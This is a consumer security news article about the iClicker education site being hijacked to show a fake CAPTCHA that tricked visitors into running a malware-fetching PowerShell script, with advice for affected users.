Malicious CAPTCHA Test Targets Education Site: What to Do If the Scam Hit Your PC

Malicious CAPTCHA Test Targets Education Site: What to Do If the Scam Hit Your PC

The iClicker.com education site was hijacked last month to display a malicious CAPTCHA test, designed to trick users into installing Windows malware. The popular online platform, which provides IT services for teachers, has over 5,000 instructors and 7 million students using its products.

The fake CAPTCHA test, discovered by security researchers at BleepingComputer, appeared on the landing page of iClicker.com from April 12-16. Normally, CAPTCHA tests are designed to prevent web-scraping bots by asking online visitors to complete a challenge, like identifying objects in an image. However, this malicious CAPTCHA test disguised its challenge as a set of computer commands, including "Press Win + R," "Press CTRL + V" and then "Enter."

Unaware users might perform the instructions, thinking it's an innocuous request. But in reality, the first command will trigger the PC to open the run dialog box, a way to launch programs. Hitting “CTRL + V” will then paste some malicious computer code that the CAPTCHA test added to their clipboard. Pressing Enter will then execute the code.

The pasted computer code operates as a PowerShell script that retrieves additional malware when run, giving the hacker remote access to the PC. The University of Michigan's IT security team initially warned students about the fake CAPTCHA test earlier this month.

“Users of iClicker are at risk if they logged into the iClicker site and followed the directions in the fake CAPTCHA from April 12-16,” the University of Michigan says. The parent company Macmillan Learning didn’t immediately respond to a request for comment, but iClicker confirmed the hijacking in a security bulletin.

“An unrelated third party placed a false Captcha on our iClicker landing page before users logged into iClicker on our website,” the notice says. “This third party was hoping to get users to click on the false captcha similar to what we unfortunately experience quite often in phishing emails these days.” The security bulletin, however, was configured to prevent search engines from indexing it.

Although it’s unclear what malware was installed, the bulletin advises teachers or students who fell for the fake CAPTCHA test to immediately run antivirus software on their PCs. Affected victims should also consider changing their passwords since it’s possible the malware was designed to steal login credentials and cookies from internet browsers.

Be Cautious Around CAPTCHA Tests

Security researchers have also spotted fake CAPTCHA tests targeting gamers, highlighting the need for users to be cautious around such tests. If you receive a CAPTCHA test that asks you to perform unusual keyboard commands, trust your instincts and avoid following the instructions.

What to Do Next

If you suspect that your PC has been infected with malware from the fake CAPTCHA test, take immediate action:

  • Ran antivirus software on your PC to detect and remove any malware.
  • Changed your passwords for all accounts, especially those related to email, social media, and online banking.
  • Regularly back up your data to a secure location.

By being aware of these tactics and taking the necessary precautions, you can protect yourself from falling victim to malicious CAPTCHA tests and other cyber threats.